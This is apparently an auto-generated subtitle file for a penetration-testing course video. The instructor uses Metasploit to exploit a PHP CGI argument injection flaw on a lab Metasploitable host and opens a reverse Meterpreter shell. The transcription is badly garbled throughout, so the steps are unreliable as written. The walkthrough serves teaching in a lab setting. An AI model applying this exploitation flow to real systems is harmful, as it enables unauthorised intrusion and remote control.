1
00:00:00,390 --> 00:00:04,380
So let's go back and view the Matus voidable HDB services.

2
00:00:05,340 --> 00:00:13,350
And I'm going to sort the results due to poor numbers now, the service run import 80 will be my next

3
00:00:13,350 --> 00:00:14,520
service to exploit.

4
00:00:15,960 --> 00:00:18,150
And I want a check of Nessa's find something.

5
00:00:19,670 --> 00:00:22,820
So type Volman P.

6
00:00:24,140 --> 00:00:26,570
And the IP address of the target?

7
00:00:27,290 --> 00:00:30,650
Oh, yeah, there are many findings about this service.

8
00:00:32,570 --> 00:00:35,730
So you can go ahead and examine the results and search for where they are.

9
00:00:36,230 --> 00:00:39,860
Are they really vulnerabilities or are they not?

10
00:00:40,970 --> 00:00:51,500
And I see that arbitrary code execution that, well, this finding even has a CVN No.

11
00:00:52,680 --> 00:01:00,720
So you can search this number in Métis Point to search, copy and paste the number, nothing.

12
00:01:02,910 --> 00:01:04,530
OK, so look at the other rows.

13
00:01:06,070 --> 00:01:07,710
All right, so let's copy this one.

14
00:01:09,540 --> 00:01:11,550
That search that in MSF.

15
00:01:14,160 --> 00:01:20,720
OK, yeah, so this is next week, so keep looking at the other lines as well.

16
00:01:21,970 --> 00:01:23,830
In other remote code execution.

17
00:01:26,750 --> 00:01:28,430
Yeah, OK, so this is what I want.

18
00:01:30,020 --> 00:01:32,290
But you can check the other lines as well.

19
00:01:33,620 --> 00:01:38,210
And first one with tweaky is a little bit old.

20
00:01:40,020 --> 00:01:44,720
The CGI argument injection, I think that's the better one.

21
00:01:45,770 --> 00:01:47,180
So I'm going to use this.

22
00:01:49,130 --> 00:01:50,660
Show me the options.

23
00:01:52,210 --> 00:01:54,370
Let's show the payloads to.

24
00:01:56,390 --> 00:02:00,170
And use reverse interpretor payload.

25
00:02:02,530 --> 00:02:07,720
Set our host to tend to tend to doubt one for.

26
00:02:08,710 --> 00:02:14,110
Said payload to AHP interpretor.

27
00:02:15,150 --> 00:02:17,880
Reverse TCAP.

28
00:02:19,950 --> 00:02:21,120
Set almost.

29
00:02:23,420 --> 00:02:25,430
And El Port also.

30
00:02:27,170 --> 00:02:33,640
And now let's show the options and make sure that everything is OK.

31
00:02:35,340 --> 00:02:39,510
All right, then, let's exploit.

32
00:02:41,380 --> 00:02:44,470
OK, the interpreter shall open.

33
00:02:45,620 --> 00:02:50,800
So let's get you I.D. to see just exactly who I am.

34
00:02:52,070 --> 00:02:55,270
Says info review system information.

35
00:02:56,370 --> 00:02:59,460
And now these are interpreted commands.

36
00:03:00,470 --> 00:03:07,850
So in the next section, you're going to dive into my interpreter, see on the other side.